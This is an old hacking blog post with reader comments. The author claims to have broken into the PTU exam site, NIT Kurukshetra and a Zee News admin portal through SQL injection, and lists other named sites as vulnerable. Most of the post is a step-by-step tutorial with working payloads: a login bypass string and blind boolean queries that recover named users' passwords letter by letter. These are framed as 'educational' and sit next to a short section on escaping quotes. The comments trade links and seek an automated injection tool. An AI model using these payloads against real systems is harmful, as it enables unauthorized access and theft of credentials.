Actually I am a former PTU student so I have emotional touch with my UNI. I have gone thro the post and decided to check whether this is really possible or not. While googling I found that PTU Jalandhar Website XSS Vulnerability already been exploited by Mr. Ajay Pal Singh Atwal on May 29, 2006.
WTF...!!! Its being almost more then 3 years and still any average hacker can login into the website.
Where are the official authorities of PTU ???? Still after 3 years the government is sleeping. I finally decided to post this article along with the screen shoots so that some will hear the voice and fix the vulnerablities.
The first step which I have taken is to inform Registrar Mr.S. H.S. Bains and Deputy Registrar Mr.Er.S.S.Walia. Below are the screen shots of their official email ID and my email, which I sent to them.
Now lets begin step by step...how to hack websites using SQL Injection Vulnerability. Note that this is for educational purpose and if anybody use this to hack any website, I promise not to prosecute. In many countries it is illegal to use this attack. Here I am not going to share the exact method I have followed, but I will share the steps for SQL injection. One can follow these steps to perform SQL Injection attack.
WARNING:
- Up to 6 months in jail for unauthorised access
- Up to 5 years if with intent to commit further offences
The official website for PTU is www.ptuexam.com . On the top right of this screen, you will see the login page. Now you have to use discover other users' passwords from here. The SQL Injection attack allows external users to read details from the database. In a well designed system this will only include data that is available to the public anyway.
How to Identify a Site Vulnerable to an SQL Injection Attack
- If a web page accepts text entry (for example a user name and password) then try entering a string that contains one single quote.
- A vulnerable site may behave oddly given this input. You may see an error message such as that shown:
Take a guess
- Before hacking the system, try to guess a user name and password. Unless you are very lucky you will not get into the system.To know more about PASSWORD GUESSING, CLICK HERE
Force an Error
- If you enter a string with a single quote in it such as O'Brien for either user name or password you will get a Software Error as the SQL is invalid and cannot be parsed.
Force Entry
- If you enter the string ' OR ''=' as both user name and password you can ensure that the WHERE clause always returns true. Without knowing any user names or passwords you can by-pass the log in screen. In this example you get the user name of the first person in the table.
The magic string works because it program evaluates:
SELECT name from users WHERE name='name' AND password='password'
as the 'always true' string:
SELECT name from users WHERE name='' OR ''='' AND password='' OR ''=''
In which we discover the names of the tables available for viewing. The function DATABASE() will give you that value. When you know the name of the database being used you can take guesses at the names of the tables.
Does the current database contain the letter j?
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
Is there a table called one in database test?
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
Is there more than one table in the database(s) containing a j?
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
The below is the list of PTU students username and passwords.
You can only ask yes/no questions, but you can find out just about anything you want to with a little patience.
You use xx for the user name and enter the following as password:
Are there more than 10 rows in the password table?
' OR (SELECT COUNT(*) FROM users)>10 AND ''='
Is there a user with an r in his name?
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
Is there a user (other than ajaypal) with an a in his name?
' OR EXISTS(SELECT * FROM users WHERE name!='ajaypal' AND name LIKE '%a%') AND ''='
Find the below example, You can find other users on the system. We choose to get mandeep's password in the below string.
' OR EXISTS(SELECT * FROM users WHERE name='mandeep' AND password LIKE '%w%') AND ''='
You can now get the system to answer questions about the password table. It will only ever answer yes (and let you in) or no (by refusing entry). Your questions must take the form of a valid SQL query. In each case use a xx for the user name and the text shown as password. You can ask questions such as:
Does jake's password have a w in it?
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
Does jake's password start with w?
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'w%') AND ''='
Does jake's password have an w followed by d?
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='
Is the fourth letter of jake's password w?
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='
This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
Below is the login page for NIT Kurukshetra.
After getting my hands dirty with few SQL strings, I got access to the below account. I login and simply logged out without making any changes.
After this I move towards Official website of ZEE News Noida and got the access to below ADMIN portal. Here I got the access to all the accounts.
Below is the internal view of one account. I haven't make any change or even not tried to edit any information, but my motive is only to show that up to which extent one can enter into such a websites.
Websites which are vulnerable with same SQL Injection vulnerability are listed below:
- FITJEE
- SPM Law College
- NISCAIR
- NAAC ..... and many more..!!
Causes of and Cures for SQL Injection
The SQL Injection attack is possible when the programmers who write the code behind the page neglect to properly escape strings that are used in SQL queries.
Programs common build SQL queries such to check values. For example the SQL statement: will return one row if the given user/password combination exists in the table users.
SELECT name FROM users WHERE name='freehacking' AND password='website'
Of course the values freehacking and website are taken from values entered by the user. To build the SQL query the Perl programmer might use a line such as:
$sql = "SELECT name FROM users WHERE name='$Q::name' AND password='$Q::password'"
The VB programmer might use something like:
sql = "SELECT name FROM users WHERE name='" & name & "' AND '" & password & "'"
In both cases the sql string generated will be invalid SQL if the variable name contains a single quote.
Worse, a sneaky user might enter a string that results in valid SQL, but SQL that generates unexpected reults.
Cures
The cure is simply to escape single quotes properly. In most cases that mean substitute a single quote with two single quotes. In Perl you could use:
$sql = sprintf 'SELECT name FROM users WHERE name=%s AND password=%s,
$dbh->quote($Q::name),$dbh->quote($Q::password);
In VB you could use:
sql = "SELECT name FROM users WHERE name='" & replace(name,"'","''") & _
"' AND password='" & replace(password,"'","''")
7 Visitor Reactions & Comments:
AWESOME ..........
IT IS JUST TO GOOD MAN...
Excellent brother..You hit the nail right on the head..however I doubt one thing, was it really necessary to show how to hack it, i mean now many of outsiders could really abuse it..thats why i didnt show how to do that. But anyways..amazing work!
Rishabh
www.prohack.in
Hi Rishabh,
Thanks for your comment. Well don't even think about to post the method as it is. You may be in danger. Why to take risk. Its all about our career man. We can not take any risk. The maximum is to inform, and we both have done the same. We both want to use the skills in wthical way..and doing the same. We have control on ourselves...but one can not take the responsibilities of any one else. I also suggest you that before posting any such post, at least inform in written to the concerning authorities. The same I have done by sending email.
Also I have seen the logs, and found that so many other guys already been login before me...LOLZ..
Cheers...Are you intrested in link sharing
Hi Sir
Thanks for your constructive comment,you are senior to me and its an honor to have a link exchange with such a knowledgeable person like you.I have put your link on my website.
you can put mine as
link - www.prohack.in
Display text - Prohack
Link title - Hacking tips,tutorials and latest technology news
Best regards
Rishabh Dangwal
www.prohack.in
Hi Rishabh,
The Link has been posted...Well lets be friends and lets work together in the field of cyber security. I have so many friends helping me.http://techkranti.blogspot.com/ is also supporting us.
Check all members list @ https://freehacking.net/p/need-professional-email-address-wrt.html
I will create you mail id OR ... what ever you want.
I also invite you for guest post.
To join me on other social networking sites, visit @ http://www.venturousbikers.com/2009/12/add-amarjit-singh-on-social-networking.html
Well the method is correct,but its not very easy for the newbies.There is a software named sql helper which can implement an sql attack automatically
http://rafayhackingarticles.blogspot.com
Share that software. Let us test it.